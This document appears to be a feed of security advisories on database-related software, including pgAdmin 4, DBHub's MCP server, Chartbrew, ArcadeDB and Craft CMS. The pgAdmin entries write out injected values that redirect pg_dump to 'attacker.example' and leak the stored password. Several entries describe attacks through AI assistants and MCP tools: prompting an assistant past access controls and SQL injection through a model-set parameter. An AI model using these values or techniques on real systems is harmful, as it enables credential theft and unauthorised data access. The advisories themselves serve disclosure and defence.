Armatura One stores database and message-broker credentials in an install configuration file, encrypting them with AES-128-CBC when this protection is enabled. The encryption key and initialization vector are fixed values embedded in the software itself and are identical across every installation. An attacker with a copy of the installation package can recover this key and initialization vector, and can then decrypt the stored credentials of any specific installation to which the attacker separately obtains the encrypted configuration file.

Oct 2, 2026The postgresql-operator charm runs a Prometheus postgres_exporter to collect database metrics using a dedicated "monitoring" PostgreSQL user.CVE-2026-104055 · Other software · Canonical · reported by security@ubuntu.comMedium 5.3
The postgresql-operator charm runs a Prometheus postgres_exporter to collect database metrics using a dedicated "monitoring" PostgreSQL user. On database connection errors, the exporter writes the monitoring user's password in cleartext to its logs. Any actor able to read those logs can recover the password, which grants read-only pg_monitor access to PostgreSQL. This is fixed in the dev track (14/edge) in revisions 1189 (arm64) and 1190 (amd64), and in the stable track (14/stable) in revisions 1216 (arm64) and 1217 (amd64).

Sep 24, 2026DBHub is a database MCP server for Postgres, MySQL, SQL Server, Oracle, MariaDB, SQLite.CVE-2026-61788 · Other software · bytebase · reported by GitHubHigh 7.4
DBHub is a database MCP server for Postgres, MySQL, SQL Server, Oracle, MariaDB, SQLite. Prior to version 0.22.6, setting `readonly = true` on the `execute_sql` tool does not make the connection read-only. The connectors are written to set PostgreSQL `default_transaction_read_only=on` (and open SQLite in `readOnly` mode), but that code is gated on a config value that is never populated, so it never runs. The only thing left enforcing read-only is a classifier that inspects the first keyword of each statement. Any `SELECT` that writes or has side effects through a function call passes it. With an ordinary role this allows sequence tampering; with a privileged role it allows writing arbitrary files on the server (`lo_export`), reading arbitrary host files (`pg_read_file`), and remote code execution (`dblink` + `COPY ... TO PROGRAM`). The HTTP transport is unauthenticated and binds to `0.0.0.0` by default, so this is reachable by any network caller of `/mcp`. Version 0.22.6 patches the issue.

Sep 24, 2026DBHub is a database MCP server for Postgres, MySQL, SQL Server, Oracle, MariaDB, SQLite.CVE-2026-61742 · Other software · bytebase · reported by GitHubCritical 9.3
DBHub is a database MCP server for Postgres, MySQL, SQL Server, Oracle, MariaDB, SQLite. Versions prior to 0.22.5 expose an unauthenticated HTTP MCP endpoint when started with the documented HTTP transport mode, for example `--transport http --port 8080`. The HTTP server attempts to protect browser-origin access by checking whether the `Origin` hostname equals the `Host` hostname, then reflecting the validated `Origin` into `Access-Control-Allow-Origin`. This does not stop DNS rebinding. After an attacker-controlled hostname rebinds to a victim-accessible DBHub HTTP server, both `Origin` and `Host` can contain the attacker-controlled hostname, so DBHub accepts the request and dispatches MCP tool calls. As a result, a malicious website can deterministically invoke DBHub MCP tools from the victim's browser without prompt injection or model involvement. With the default demo configuration this can read and write the demo SQLite database; with a real configured database, the same primitive can read, enumerate, and potentially write database contents depending on DBHub's configured tool permissions and database credentials. Version 0.22.5 fixes the issue.

In MISP's UsersController login() method, the pre-authentication database query used for the TOTP (two-factor authentication) verification branch did not include the User.disabled column in its SELECT fields list. The query selected only User.password, User.totp, and User.hotp_counter. When the TOTP branch subsequently accessed $unauth_user['User']['disabled'], the key was absent from the result set, producing a PHP 'Undefined array key' warning and causing the expression to evaluate as null (falsy). As a result, the disabled-user guard in the TOTP branch was effectively a no-op: a disabled, TOTP-enrolled user could proceed to the TOTP verification step rather than being rejected at that point. The commit message explicitly states this was 'harmless in practice' because the subsequent identify() call re-validates the user and would still reject a disabled account. The practical security impact is therefore minimal, limited to a very small information-disclosure difference in the login response (a TOTP prompt is presented instead of an immediate rejection) and a PHP warning in application logs.

Sep 21, 2026Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts.CVE-2026-65980 · Other software · chartbrew · reported by GitHubHigh 7.9
Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 5.2.3, Chartbrew's ClickHouse protocol in server/sources/plugins/clickhouse/clickhouse.protocol.js calls applySqlVariables() from server/sources/shared/sql/sql.variables.js without enabling the escapeBackslash option. For a ClickHouse-backed chart with variable binding, an attacker can supply a backslash before a quote so quote doubling does not keep the value within its intended SQL string literal. Public dashboards can expose this path without authentication, and successful exploitation can execute arbitrary ClickHouse SQL to disclose data or, when the database configuration permits, access files or internal network resources. Sep 21, 2026Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts.CVE-2026-61852 · Other software · chartbrew · reported by GitHubMedium 5.8
Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 5.2.2, Chartbrew's runQuery() implementation in server/modules/ai/orchestrator/tools/runQuery.js interpolates the AI tool's row_limit parameter into a SQL LIMIT clause without runtime integer validation. The read-only keyword check runs before this value is appended, so an authenticated user who can influence a model-generated non-integer row_limit can add SQL that bypasses the earlier check. Successful exploitation can execute arbitrary statements against the connected database, including reading or changing data and, where database permissions permit, accessing files or executing operating-system commands. Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 5.2.2, Chartbrew's runQuery() implementation in server/modules/ai/orchestrator/tools/runQuery.js attempts to enforce read-only database access with a blocklist containing only seven SQL keywords. An authenticated user with AI feature access can submit dangerous statements or database functions that are absent from the read-only keyword blocklist, causing them to execute without SQL injection or keyword-obfuscation techniques. This may result in unintended disclosure of stored field values, unintended selection of documents for application-initiated writes, and reduced database performance.

Sep 18, 2026ClipBucket v5 before 5.5.3-#182 contains a blind SQL injection vulnerability that allows authenticated users to extract arbitrary database contents by submittinCVE-2026-77928 · Other software · MacWarrior · reported by VulnCheckHigh 7.1
ClipBucket v5 before 5.5.3-#182 contains a blind SQL injection vulnerability that allows authenticated users to extract arbitrary database contents by submitting the msg_id parameter as an array to bypass the clean_requests() sanitization function in ClipBucket.class.php. Attackers can pass unsanitized array elements through the deletion handler in private_message.php into cb_pm::delete_msg(), which interpolates the unescaped message ID directly into a SQL query string, enabling time-based blind SQL injection to retrieve all user credential hashes and email addresses.

Sep 18, 2026ArcadeDB before 26.9.1 (com.arcadedb:arcadedb-engine <= 26.8.1) fails to bind the authenticated principal onto the DatabaseAsyncTransaction async worker threadsCVE-2026-93596 · Other software · ArcadeData · reported by VulnCheckMedium 5.3
ArcadeDB before 26.9.1 (com.arcadedb:arcadedb-engine <= 26.8.1) fails to bind the authenticated principal onto the DatabaseAsyncTransaction async worker threads used by the parallel edge-connect phase of POST /api/v1/batch/{database}. Because those workers have no current user, LocalDatabase.checkPermissionsOnFile returns early and allows the write, bypassing per-type CREATE_RECORD/UPDATE_RECORD ACL enforcement. In deployments that rely on per-type or per-group ACLs, an authenticated low-privilege user holding CREATE_RECORD on an edge type E but with CREATE_RECORD/UPDATE_RECORD revoked on a vertex type V can submit a graph edge-load batch request (with parallelFlush at its default value of true) and durably append edges to protected vertices of type V by writing records into V's <V>_out_edges/<V>_in_edges buckets, resulting in unauthorized modification of graph adjacency. Setting parallelFlush=false causes the request to be correctly rejected. This is an incomplete fix of GHSA-c23x-pqcj-7hfm, which bound the principal only on the HTTP handler thread.

Sep 18, 2026ArcadeDB before 26.9.1 contains an access control bypass vulnerability in the query_database tool exposed through the AI chat endpoints.CVE-2026-93595 · Other software · ArcadeData · reported by VulnCheckHigh 7.1
ArcadeDB before 26.9.1 contains an access control bypass vulnerability in the query_database tool exposed through the AI chat endpoints. The tool executes queries without binding the authenticated principal to DatabaseContext, causing per-type and per-bucket ACL checks to silently no-op and allowing authenticated users to read data they are explicitly denied at the per-type level. Attackers can prompt the AI assistant to execute queries against restricted types or buckets to retrieve sensitive data that would be rejected through normal query endpoints.

Sep 17, 2026pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailinCVE-2026-86864 · Other software · pgadmin.org · reported by f86ef6dc-4d3a-42ad-8f28-e6d5547a5007High 8.7
pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further. The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. Sep 17, 2026pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql.CVE-2026-86862 · Other software · pgadmin.org · reported by f86ef6dc-4d3a-42ad-8f28-e6d5547a5007High 7.1
pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user. The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases,

Sep 17, 2026MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases.CVE-2026-61700 · Other software · mariadb-corporation · reported by GitHubLow 3.7
MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, ClientMessage.readPacket processes a server-initiated LOCAL INFILE protocol packet 0xfb without enforcing allowLocalInfile=false. When an application sends a LOAD DATA LOCAL INFILE COM_QUERY, a rogue or man-in-the-middle server can echo the same filename and cause the connector to transmit that file despite the disabled option. The server cannot redirect the request to an arbitrary path and can receive only the exact file already selected by the application, so exploitation requires an application that actively loads sensitive data over an untrusted connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.

Sep 16, 2026Craft CMS 5.0.0 through 5.10.12 treats a database connection failure as meaning that Craft is not installed, which makes anonymous installer actions — includingCVE-2026-92591 · Other software · craftcms · reported by VulnCheckHigh 8.2
Craft CMS 5.0.0 through 5.10.12 treats a database connection failure as meaning that Craft is not installed, which makes anonymous installer actions — including install/validate-site — reachable on an installed production site whenever PHP remains available but the configured MySQL endpoint does not. The action accepts a site name, serializes it through Site::getName(), and expands ${NAME} expressions using App::env(). An unauthenticated attacker who obtained a guest session cookie and matching CSRF token before the outage and whose session remains valid during it can submit a predictable variable name (for example Craft's conventional CRAFT_SECURITY_KEY) and receive its value, disclosing Craft secrets, process environment variables, $_SERVER entries, or PHP constants such as the security key, database credentials, or API keys. The issue requires an independently occurring database outage; the vulnerability itself provides no way to induce it. Fixed in 5.10.13.
